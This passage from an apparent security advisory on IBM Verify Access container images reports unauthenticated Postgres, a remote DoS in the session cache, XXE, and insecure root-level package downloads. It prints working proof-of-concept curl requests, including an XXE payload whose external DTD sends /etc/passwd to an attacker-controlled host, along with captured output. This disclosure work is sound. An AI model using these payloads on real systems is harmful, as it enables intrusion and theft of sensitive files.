"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \ 203 "$CONFIG_SERVICE_URL/fixpacks/$fixpackUri" \ 204 -o $fixpack_dir/$fixpack [/code]

The fixpacks will be then installed as root inside the image:

Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell] 231 for fixpack in $FIXPACKS; do 232 Echo 967 "${fixpack}" 233 /usr/sbin/isva_install_fixpack -i ${fixpack_dir}/${fixpack} >/dev/null 234 if [ $? -ne 0 ]; then 235 Echo 968 "${fixpack}" 236 fi [/code]

An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform.

Details - Lack of authentication in Postgres inside verify-access-runtime

It was observed that the Docker image verify-access-runtime configures Postgres without authentication.

The /usr/sbin/bootstrap.sh script configures and starts the postgres daemon. We can see the lack of authentication:

[code:shell] 135 # 136 # Start the postgresql server. 137 # 138 139 Echo 974 140 141 db_root=/var/postgresql/config 142 db_data_root=$db_root/data 143 db_snapshot=$db_root/snapshot.sql 144 db_log_dir=/var/application.logs/db/config 145 db_port=5432 146 db_name=config 147 db_user=www-data 148 149 if [ ! -f $db_snapshot ] ; then 150 Echo 975 151 exit 1 152 fi 153 154 mkdir -p $db_log_dir 155 156 rm -rf $db_data_root 157 158 initdb -D $db_data_root --locale=C -U $db_user -A trust > /dev/null 159 160 pg_ctl -s -D $db_data_root -l $db_log_dir/logfile start 161 162 createdb -U $db_user -p $db_port -w $db_name > /dev/null 163 164 psql -U $db_user -p $db_port -f $db_snapshot -w -q $db_name > /dev/null 165 [/code]

A local attacker can compromise the postgres database.

Details - Null pointer dereference in dscd - Remote DoS against DSC instances

It was observed that the DSC (Distributed Session Cache) servers can be remotely crashed, resulting in a DoS of the authentication infrastructure.

The DSC servers are reachable using the /DSess/services/DSess API running on port 8443/tcp.

Using an SSL client certificate, it is possible to reach the remote DSC instances from the same network segment:

[user@container-01 ~]$ curl -kv https://dsc-02.test.lan:8443
* Rebuilt URL to: https://dsc-02.test.lan:8443/
*   Trying 10.0.0.16... 
* TCP_NODELAY set
* Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/pki/tls/certs/ca-bundle.crt
  CApath: none
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Request CERT (13):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Certificate (11):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS alert, handshake failure (552):
* error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure
* Closing connection 0
curl: (35) error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure

With a client certificate, we can reach the /DSess/services/DSess API:

Sending a normal request (ping):

kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc.test.lan:8443/DSess/services/DSess -X POST -H 'SOAPAction: "ping"' --data '<?xml version="1.0" encoding="utf-8" ?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns1:ping xmlns:ns1="http://sms.am.tivoli.com"><ns1:something>0</ns1:something></ns1:ping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
<?xml version='1.0' encoding='utf-8' ?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:pingResponse xmlns:ns1="http://sms.am.tivoli.com">
<ns1:pingReturn>952467756</ns1:pingReturn>
</ns1:pingResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

We can also send a specific XML External Entity (XXE) that will crash the remote DSC instance:

kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -X POST -H 'SOAPAction: "ping"' --data '<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///dev/random">]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns1:ping xmlns:ns1="http://sms.am.tivoli.com"><ns1:something>&xxe;</ns1:something></ns1:ping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
curl: (52) Empty reply from server

When debugging this issue, it appears there is a null pointer dereference in the method DSessWrapper::ping(void*) () defined in /lib64/libamdsc_interface.so library:

[root@container-02]# ps -auxww | grep dscd
6000     2093037  3.4  0.5 427936 40884 ?        Ssl  20:07   0:00 /opt/dsc/bin/dscd -c /var/dsc/etc/dsc.conf.1 -f -j
root     2093269  0.0  0.0  12140  1092 pts/0    S+   20:07   0:00 grep --color=auto dscd
[root@container-02]# gdb -p 2093037
[...]
(gdb) c
Continuing. 
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x7fec38006110 --> 0x7fecaf4df160 --> 0x7fecaf280e20 --> 0x4100261081058b48 
RCX: 0x7fec38000b60 --> 0x1000100030005 
RDX: 0x7fec38025900 --> 0x7fec38021c90 --> 0x7fec38026230 --> 0x7fec38025dc0 --> 0x0 
RSI: 0x4 
RDI: 0x0 
RBP: 0x7fec2804f7c0 --> 0x7fecb0297548 --> 0x7fecb0079560 --> 0x480021e921058b48 
RSP: 0x7feca642fc10 --> 0x1d2e480 --> 0x7fecaf4dfbf8 --> 0x7fecaf292870 --> 0x410024f509058b48 
RIP: 0x7fecb007a595 --> 0x48ffffca04e8188b 
R8 : 0x7fec38000b74 --> 0x3000600060005 
R9 : 0x4 
R10: 0x2f ('/')
R11: 0x7fecaabb2674 --> 0x29058b48fb894853 
R12: 0xffffffff 
R13: 0x7feca642fca0 --> 0x7fec380312f0 ("/DSess/services/DSess")
R14: 0x7feca642fce0 --> 0x7feca642fcf0 --> 0x7f00676e6970 
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7fecb007a58a <_ZN12DSessWrapper4pingEPv+154>:      call   QWORD PTR [rax+0x38]
   0x7fecb007a58d <_ZN12DSessWrapper4pingEPv+157>:      mov    esi,0x4
   0x7fecb007a592 <_ZN12DSessWrapper4pingEPv+162>:      mov    rdi,rax
=> 0x7fecb007a595 <_ZN12DSessWrapper4pingEPv+165>:      mov    ebx,DWORD PTR [rax]
   0x7fecb007a597 <_ZN12DSessWrapper4pingEPv+167>:      call   0x7fecb0076fa0 <_ZdlPvm@plt>
   0x7fecb007a59c <_ZN12DSessWrapper4pingEPv+172>:      mov    rdi,QWORD PTR [rsp+0x18]
   0x7fecb007a5a1 <_ZN12DSessWrapper4pingEPv+177>:      mov    rax,QWORD PTR [rdi]
   0x7fecb007a5a4 <_ZN12DSessWrapper4pingEPv+180>:      call   QWORD PTR [rax+0x2f0]
[------------------------------------stack-------------------------------------]
0000| 0x7feca642fc10 --> 0x1d2e480 --> 0x7fecaf4dfbf8 --> 0x7fecaf292870 --> 0x410024f509058b48 
0008| 0x7feca642fc18 --> 0x7fecaf292d8e --> 0xda89481d74c08548 
0016| 0x7feca642fc20 --> 0x7fec28040830 --> 0x7fecaf4e00a0 --> 0x7fecaf29b5a0 --> 0x4100246a21058b48 
0024| 0x7feca642fc28 --> 0x1e3f6e0 --> 0x7fecaf4e1120 --> 0x7fecaf2b2450 --> 0x530022f9a9058b48 
0032| 0x7feca642fc30 --> 0x7feca642fc80 --> 0x7feca642fc90 --> 0x7fec30071c00 --> 0x50 ('P')
0040| 0x7feca642fc38 --> 0x7fec3800e720 --> 0x7fecaf4dece8 --> 0x7fecaf27a770 --> 0x4800267369058b48 
0048| 0x7feca642fc40 --> 0x7fec38006110 --> 0x7fecaf4df160 --> 0x7fecaf280e20 --> 0x4100261081058b48 
0056| 0x7feca642fc48 --> 0x7fecaf27a8a1 --> 0xf2e668debc48941 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so
gdb-peda$ bt
#0  0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so
#1  0x00007fecaf27a8a1 in tivsec_axiscpp::ServerAxisEngine::invoke(tivsec_axiscpp::MessageData*) () from target:/lib64/libtivsec_axis_server.so
#2  0x00007fecaf27b0d2 in tivsec_axiscpp::ServerAxisEngine::process(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so
#3  0x00007fecaf297156 in process_request(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so
#4  0x00007fecb02a3293 in AMWSMSServiceClient::processRequest(AMWSMSService::WorkerRequest&, bool) () from target:/lib64/libamdsc_server.so
#5  0x00007fecb02a3ff8 in AMWSMSService::workerThreadRun() () from target:/lib64/libamdsc_server.so
#6  0x00007fecb02a4089 in start_worker_thread () from target:/lib64/libamdsc_server.so
#7  0x00007fecaec801ca in start_thread () from target:/lib64/libpthread.so.0
#8  0x00007fecae6d3d83 in clone () from target:/lib64/libc.so.6

I can also confirm the null pointer dereference in the dmesg output of the container-02 test server:

[899328.145854] dscd[2106406]: segfault at 0 ip 00007f18e53ff595 sp 00007f18db93ac10 error 4 in libamdsc_interface.so[7f18e53ec000+30000]
[899485.595069] dscd[2107491]: segfault at 0 ip 00007f25a6041595 sp 00007f259c9cdc10 error 4 in libamdsc_interface.so[7f25a602e000+30000]
[899575.542524] dscd[2109718]: segfault at 0 ip 00007f331fde5595 sp 00007f3316938c10 error 4 in libamdsc_interface.so[7f331fdd2000+30000]
[899614.404309] dscd[2111181]: segfault at 0 ip 00007fec9cad4595 sp 00007fec9d29dc10 error 4 in libamdsc_interface.so[7fec9cac1000+30000]
[899761.869511] dscd[2112040]: segfault at 0 ip 00007f86cf8a0595 sp 00007f86c5edfc10 error 4 in libamdsc_interface.so[7f86cf88d000+30000]

I can confirm the verify-access-dsc instance crashes on container-02 as shown below.

Before the PoC, the verify-access-dsc instance is running:

[root@container-02]# podman ps
CONTAINER ID  IMAGE                                                COMMAND       CREATED       STATUS                       PORTS                             NAMES
e462789b901b  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                     28 hours ago  Up 28 hours ago (healthy)    0.0.0.0:9443->9443/tcp            verify-access-runtime
0ff1b85073d6  ibmcom/verify-access-dsc/10.0.4.0:20220926.6                         28 hours ago  Up 28 minutes ago (healthy)  0.0.0.0:8443-8444->8443-8444/tcp  verify-access-dsc

After the PoC, the verify-access-dsc instance does not run anymore:

[root@container-02]# podman ps
CONTAINER ID  IMAGE                                                COMMAND       CREATED       STATUS                     PORTS                     NAMES
e462789b901b  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                     28 hours ago  Up 28 hours ago (healthy)  0.0.0.0:9443->9443/tcp    verify-access-runtime
[root@container-02]#

An attacker with the dsc-client SSL certificate can crash the DSC servers and crash the entire authentication system.

Details - XML External Entity (XXE) in dscd

It was observed that the DSC (Distributed Session Cache) servers are vulnerable to XML External Entity (XXE) attacks. DSC servers are used to store session information.

The DSC servers are reachable using the /DSess/services/DSess API running on port 8443/tcp.

With a client certificate, we can reach the /DSess/services/DSess API.

Content of the payload.txt file containing the XXE payload that will be sent to the remote DSC server:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://10.0.0.45/dtd.xml">
%xxe;
]>
<foo></foo>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <SOAP-ENV:Body>
                <ns1:ping xmlns:ns1="http://sms.am.tivoli.com">
                        <ns1:something>X</ns1:something>
                </ns1:ping>
        </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Content of the dtd.xml file hosted on http://10.0.0.45/. This DTD file is referenced by the payload.txt file:

kali% cat /var/www/html/dtd.xml 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.0.0.45/?x=%file;'>">
%eval;
%exfiltrate;

Sending the previous payload will result in an exception on the remote DSC server:

kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -H 'SOAPAction: "ping"' --data '@payload.txt' -v
*   Trying 10.0.0.16:8443... 
* Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)
[...]
> POST /DSess/services/DSess HTTP/1.1
> Host: dsc-02.test.lan:8443
> User-Agent: curl/7.82.0
> Accept: */*
> SOAPAction: "ping"
> Content-Length: 453
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Apache Axis C++/1.6.a
< Connection: close
< Content-Length: 330
< Content-Type: text/xml
< 
<?xml version='1.0' encoding='utf-8' ?>
<SOAP-ENV:Envelope>
<SOAP-ENV:Body>
<SOAP-ENV:Fault>
<faultcode>SOAP-ENV:Server</faultcode>
<faultstring>Unknown exception</faultstring>
<faultactor>server name:listen port</faultactor>
<detail>Unknown Exception has occured</detail>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):

At the same time, when sniffing the HTTP connections to the remote HTTP server providing http://10.0.0.45/?x=%file, we can observe HTTP requests from the DSC server (acting as a HTTP client).

There is a successful exfiltration of the /etc/passwd file of the DSC instance - this file was specified in the dtd.xml file at http://10.0.0.45/dtd.xml, used by the malicious payload:

kali# tcpdump -n -i eth0 -s0 -X port 80
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:01:12.655204 IP 10.0.0.16.60254 > 10.0.0.45.80: Flags [P.], seq 1:753, ack 1, win 229, options [nop,nop,TS val 2959987485 ecr 3936552717], length 752: HTTP: GET /root:x:0:0:root:/root:/bin/bash
[...]
    0x0030:  eaa3 070d 4745 5420 2f72 6f6f 743a 783a  ....GET./root:x:
    0x0040:  303a 303a 726f 6f74 3a2f 726f 6f74 3a2f  0:0:root:/root:/
    0x0050:  6269 6e2f 6261 7368 0a62 696e 3a78 3a31  bin/bash.bin:x:1
    0x0060:  3a31 3a62 696e 3a2f 6269 6e3a 2f73 6269  :1:bin:/bin:/sbi
    0x0070:  6e2f 6e6f 6c6f 6769 6e0a 6461 656d 6f6e  n/nologin.daemon
    0x0080:  3a78 3a32 3a32 3a64 6165 6d6f 6e3a 2f73  :x:2:2:daemon:/s
    0x0090:  6269 6e3a 2f73 6269 6e2f 6e6f 6c6f 6769  bin:/sbin/nologi
    0x00a0:  6e0a 6164 6d3a 783a 333a 343a 6164 6d3a  n.adm:x:3:4:adm:
    0x00b0:  2f76 6172 2f61 646d 3a2f 7362 696e 2f6e  /var/adm:/sbin/n
    0x00c0:  6f6c 6f67 696e 0a6c 703a 783a 343a 373a  ologin.lp:x:4:7:
    0x00d0:  6c70 3a2f 7661 722f 7370 6f6f 6c2f 6c70  lp:/var/spool/lp
    0x00e0:  643a 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a  d:/sbin/nologin. 
    0x00f0:  7379 6e63 3a78 3a35 3a30 3a73 796e 633a  sync:x:5:0:sync:
    0x0100:  2f73 6269 6e3a 2f62 696e 2f73 796e 630a  /sbin:/bin/sync. 
    0x0110:  7368 7574 646f 776e 3a78 3a36 3a30 3a73  shutdown:x:6:0:s
    0x0120:  6875 7464 6f77 6e3a 2f73 6269 6e3a 2f73  hutdown:/sbin:/s
    0x0130:  6269 6e2f 7368 7574 646f 776e 0a68 616c  bin/shutdown.hal
    0x0140:  743a 783a 373a 303a 6861 6c74 3a2f 7362  t:x:7:0:halt:/sb
    0x0150:  696e 3a2f 7362 696e 2f68 616c 740a 6d61  in:/sbin/halt.ma
    0x0160:  696c 3a78 3a38 3a31 323a 6d61 696c 3a2f  il:x:8:12:mail:/
    0x0170:  7661 722f 7370 6f6f 6c2f 6d61 696c 3a2f  var/spool/mail:/
    0x0180:  7362 696e 2f6e 6f6c 6f67 696e 0a6f 7065  sbin/nologin.ope
    0x0190:  7261 746f 723a 783a 3131 3a30 3a6f 7065  rator:x:11:0:ope
    0x01a0:  7261 746f 723a 2f72 6f6f 743a 2f73 6269  rator:/root:/sbi
    0x01b0:  6e2f 6e6f 6c6f 6769 6e0a 6761 6d65 733a  n/nologin.games:
    0x01c0:  783a 3132 3a31 3030 3a67 616d 6573 3a2f  x:12:100:games:/
    0x01d0:  7573 722f 6761 6d65 733a 2f73 6269 6e2f  usr/games:/sbin/
    0x01e0:  6e6f 6c6f 6769 6e0a 6674 703a 783a 3134  nologin.ftp:x:14
    0x01f0:  3a35 303a 4654 5020 5573 6572 3a2f 7661  :50:FTP.User:/va
    0x0200:  722f 6674 703a 2f73 6269 6e2f 6e6f 6c6f  r/ftp:/sbin/nolo
    0x0210:  6769 6e0a 6e6f 626f 6479 3a78 3a36 3535  gin.nobody:x:655
    0x0220:  3334 3a36 3535 3334 3a4b 6572 6e65 6c20  34:65534:Kernel. 
    0x0230:  4f76 6572 666c 6f77 2055 7365 723a 2f3a  Overflow.User:/:
    0x0240:  2f73 6269 6e2f 6e6f 6c6f 6769 6e0a 6973  /sbin/nologin.is
    0x0250:  616d 3a78 3a36 3030 303a 3630 3030 3a3a  am:x:6000:6000::
    0x0260:  2f68 6f6d 652f 6973 616d 3a2f 6269 6e2f  /home/isam:/bin/
    0x0270:  6261 7368 0a69 766d 6772 3a78 3a36 3030  bash.ivmgr:x:600
    0x0280:  313a 3630 3031 3a41 6363 6573 7320 4d61  1:6001:Access.Ma
    0x0290:  6e61 6765 7220 5573 6572 3a2f 6f70 742f  nager.User:/opt/
    0x02a0:  506f 6c69 6379 4469 7265 6374 6f72 3a2f  PolicyDirector:/
    0x02b0:  6269 6e2f 6661 6c73 650a 7469 766f 6c69  bin/false.tivoli
    0x02c0:  3a78 3a36 3030 323a 3630 3032 3a4f 776e  :x:6002:6002:Own
    0x02d0:  6572 206f 6620 5469 766f 6c69 2043 6f6d  er.of.Tivoli.Com
[...]

An attacker can read any file located in the instance - the DSC server will send any file specified in the payload to an attacker-controlled HTTP server.

An attacker with the dsc-client SSL certificate can exfiltrate any sensitive information from the instance.

Details - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)

It was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp use insecure communications to download several rpm and zip files that will then be installed or decompressed as root.

The /usr/sbin/install_isva.sh script contains insecure downloading of rpm files and zip files. These rpm files will then be installed as root.

An attacker located on the network can inject malicious rpm or zip files into the authentication platform and take control over the entire authentication platform.

There are 3 different /usr/sbin/install_isva.sh scripts found in these images but they share the same vulnerable code:

kali-docker# sha256sum **/install_isva.sh   
1c851f579baeda9d3c11e7721aaa5960dc6a3d6b052bcc8a46979d0634e31892  _verify-access-dsc.tar/787d9cec79e27fccd75a56b7101b39da38161f9d3749d6d0fd7cfcc8252aca34/usr/sbin/install_isva.sh
00f2ca8ad004af9c9e16b6cfdf480dcdb52dc36c7ff64df2bcc34495f6a9ae8d  _verify-access-runtime.tar/694cb5f84eff9a4b0aac37a4bd9f65116051953f3aee5e4e998af5938e684a5e/usr/sbin/install_isva.sh
8a59d7f89c6d587d9b764b9e4748cf0d20d406f65433a813464b32a13745f6da  _verify-access-wrp.tar/937031a6ab4bc7bd504dcbee8d242f181e904c1722489077cf468daae176e2da/usr/sbin/install_isva.sh

Vulnerable code in verify-access-dsc - download over HTTP or without checking the SSL certificate (lines 24, 60 and 82) and installation of packages as root without checking the signatures (line 76):

Content of /usr/sbin/install_isva.sh in verify-access-dsc:

[code:shell] 22 files=/root/files.txt 23 24 curl -k ${WEBSERVER}/ -o $files [...] 38 # 39 # Install each of our RPMs. 40 # 41 42 pkgs="gskcrypt64 \ 43 gskssl64 \ 44 Base-ISVA \ 45 idsldap-license64 \ 46 idsldap-cltbase64 \ 47 idsldap-clt64bit64 \ 48 Pdlic-PD \ 49 TivSecUtl-TivSec \ 50 PDRTE-PD \ 51 PDWebRTE-PD \ 52 PDWebDSC-PD" 53 54 for pkg in $pkgs; do 55 echo "Installing $pkg" 56 57 # Download and install the file. 58 rpm_file=locate_rpm_file $pkg 59 60 curl -fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file [...] 76 rpm -i $extra_args /root/$rpm_file [...] 78 # Download the include file and delete all files not included in the file. 79 include=rpm -qp /root/$rpm_file --qf "%{NAME}.include" 80 include_file=/root/$include 81 82 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e 83 84 if [ $rc -eq 0 -a -f $include_file ] ; then 85 # Convert the include file to be regular expression based instead of 86 # glob based. 87 sed -i "s|*|.*|g" $include_file 88 89 for entry in rpm -ql /root/$rpm_file | grep -xvf $include_file; do 90 if [ -f $entry ] ; then 91 rm -f $entry 92 fi 93 done 94 fi [/code]

The code in verify-access-wrp is also very similar and shares the same vulnerabilities.

Vulnerable code in verify-access-runtime - same vulnerability in /usr/sbin/install_isva.sh with an additional vulnerability with the insecure download, due to the -k option on line 117 (alias to --insecure) and extraction of zip files as root in line 119:

[code:shell] 28 files=/root/files.txt 29 30 curl -k ${WEBSERVER}/ -o $files [...] 41 pkgs="gskcrypt64 \ 42 gskssl64 \ 43 Base-ISVA \ 44 PDlic-PD \ 45 TivSecUtl-TivSec \ 46 PDRTE-PD \ 47 PDWebWAPI-PD \ 48 PDWebDSC-PD \ 49 VerifyAccessRuntimeFeatures \ 50 MesaConfig \ 51 FIM \ 52 RBA" 53 54 for pkg in $pkgs; do 55 echo "Installing $pkg" 56 57 # Download and install the file. 58 rpm_file=locate_rpm_file $pkg 59 60 curl --fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file [...] 78 rpm -i $extra_args /root/$rpm_file 79 80 # Download the include file and delete all files not included in the file. 81 include=rpm -qp /root/$rpm_file --qf "%{NAME}.include" 82 include_file=/root/$include 83 84 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e 85 86 if [ $rc -eq 0 -a -f $include_file ] ; then 87 # Convert the include file to be regular expression based instead of 88 # glob based. 89 sed -i "s|*|.*|g" $include_file 90 91 for entry in rpm -ql /root/$rpm_file | grep -xvf $include_file; do 92 if [ -f $entry ] ; then 93 rm -f $entry 94 fi 95 done 96 fi [...] 108 zips="\ 109 com.ibm.tscc.rtss.wlp.zip:/opt/rtss \ 110 com.ibm.isam.common.eclipse.wlp.zip:/opt/IBM \ 111 pdjrte-0.0.0-0.zip:/opt" 112 113 for entry in $zips; do 114 zip=echo $entry | cut -f 1 -d ':' 115 dst=echo $entry | cut -f 2 -d ':' 116 117 curl --fail -s -k ${WEBSERVER}/$zip -o /root/$zip 118 mkdir -p $dst 119 unzip -q /root/$zip -d $dst 120 121 rm -f /root/$zip 122 done [/code]

Details - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)

It was observed that the Docker image verify-access-runtime insecurely downloads zip files.

An attacker located on the network can inject malicious zip files into the platform and take control over the entire platform.

The /usr/sbin/install_java_liberty.sh script contains insecure downloading of zip files. These zip files will then be extracted as root into the /opt/java, /opt/ibm, /opt/oracle/jdbc and /opt/IBM/db2 directories, providing WebSphere Liberty binaries (that will then be used to provide executable code).

It is also possible to remotely delete any file as root (lines 61 to 65).

Vulnerable code in /usr/sbin/install_java_liberty.sh:

[code:shell] 14 web_files=/root/files.txt 15 16 locate_file() 17 { 18 grep "$1" $web_files | cut -f 2 -d '"' 19 } 20 curl -k ${WEBSERVER}/ -o $web_files 21 [...] 29 # 30 # Install each of our zip files. 31 # 32 33 zips="\ 34 ibm-semeru-open-jre_x64_linux_11..tar.gz:/opt/java \ 35 liberty..zip:/opt/ibm \ 36 oracle_jdbc_..zip:/opt/oracle/jdbc \ 37 ibm-db2-jdbc..tar.gz:/opt/IBM/db2" 38 39 for entry in $zips; do 40 zip=echo $entry | cut -f 1 -d ':' 41 dst=echo $entry | cut -f 2 -d ':' 42 43 # Download and install the file. 44 zip_file=locate_file $zip 45 46 curl --fail -s -k ${WEBSERVER}/$zip_file -o /root/$zip_file 47 48 mkdir -p $dst 49 50 set +e; echo $zip | grep -q .zip; rc=$?; set -e 51 if [ $rc -eq 0 ] ; then 52 unzip -q /root/$zip_file -d $dst 53 exclude=echo $zip_file | sed "s|.zip|.exclude|g" 54 else 55 tar -x -C $dst -f /root/$zip_file 56 exclude=echo $zip_file | sed "s|.tar.gz|.exclude|g" 57 fi 58 59 exclude_file=/root/$exclude 60 61 set +e; curl --fail -s -k ${WEBSERVER}/$exclude -o $exclude_file; rc=$?; set -e 62 63 if [ $rc -eq 0 -a -s $exclude_file ] ; then 64 cd $dst 65 cat $exclude_file | xargs rm -rf 66 fi [/code]

Details - Remote Code Execution due to insecure Repository configuration

It was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure CentOS repositories:

- The transport is done over HTTP (in clear-text) - instead of HTTPS.
- The check of the signature is disabled.
- These repositories will be enabled by default.

An attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious RPMs and take control over the entire platform.

The /usr/sbin/install_system.sh script in these 3 images will enable 4 remote repositories over HTTP and will disable the check of signature of the downloaded packages from these repositories:

 31 centos_repo_file="/etc/yum.repos.d/centos.repo"
 32 
 33 cat <<EOT >> $centos_repo_file
 34 [CentOS-8_base]
 35 name = CentOS-8 - Base
 36 baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
 37 gpgcheck = 0
 38 enabled = 1 
 39 
 40 [CentOS-8_appstream]
 41 name = CentOS-8 - AppStream
 42 baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os
 43 gpgcheck = 0        
 44 enabled = 1
 45 EOT
[...]
 98 #
 99 # Enable install of the busybox RPM from the Fedora repository. 
100 #
101 
102 fedora_repo_file="/etc/yum.repos.d/fedora.repo"
103 
104 cat <<EOT >> $fedora_repo_file
105 [fedora]                                                                                                                                                                                        
106 name=Fedora                                                                                                                                                                                     
107 metalink=https://mirrors.fedoraproject.org/metalink?repo=fedora-33&arch=x86_64
108 enabled=1
109 gpgcheck=0
110 
111 [fedora-updates]
112 name=Fedora Updates
113 metalink=https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33&arch=x86_64
114 enabled=1
115 gpgcheck=0
116 EOT

It was confirmed that this configuration appears in the verify-access-runtime instance in the live system:

[root@container-01]# for i in $(podman ps | grep -v NAMES | awk '{ print $1 }'); do podman ps | grep $i; podman exec -it $i cat /etc/yum.repos.d/centos.repo;echo;done
4262005f3646  ibmcom/verify-access/10.0.4.0:20221006.1                         7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
cat: /etc/yum.repos.d/centos.repo: No such file or directory

c930c46acd66  ibmcom/verify-access-runtime/10.0.4.0:20221006.1                        7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:9443->9443/tcp            verify-access-runtime
name = CentOS-8 - Base
baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
gpgcheck = 0
enabled = 1

[CentOS-8_appstream]
name = CentOS-8 - AppStream
baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os
gpgcheck = 0
enabled = 1

48f1b1e8f782  ibmcom/verify-access-dsc/10.0.4.0:20221006.1                            7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:8443-8444->8443-8444/tcp  verify-access-dsc
cat: /etc/yum.repos.d/centos.repo: No such file or directory

[root@container-01]#

Furthermore, the script /usr/sbin/install_system.sh will insecurely download programs and install them as root, using the previous insecure repositories:

[code:shell] 48 # Install tools required for container build process. 49 # 50 51 microdnf -y install unzip shadow-utils jansson openssl libxslt \ 52 libnsl2 gzip cpio tar [...] 55 # We have an issue where RedHat periodically introduces a dependency on 56 # openssl-pkcs11. We don't actually need this package and so we manually remove 57 # it if it has been installed. 58 # 59 60 if [ rpm -q -a | grep openssl-pkcs11 | wc -l -ne 0 ] ; then 61 rpm --erase openssl-pkcs11 62 fi [...] 70 rpms="" 71 for lang in en cs de es fi fr hu it ja ko nl pl pt ru zh; do 72 rpms="$rpms glibc-langpack-$lang" 73 done [...] 122 microdnf -y install busybox [/code]

Details - Additional repository configuration (potential supply-chain attack)

It was observed that the Docker images verify-access-runtime and verify-access-wrp use a third-party repository configuration, obtained when retrieving the external file at https://repo.symas.com/configs/SOFL/rhel8/sofl.repo:

Content of /usr/sbin/install_system.sh:

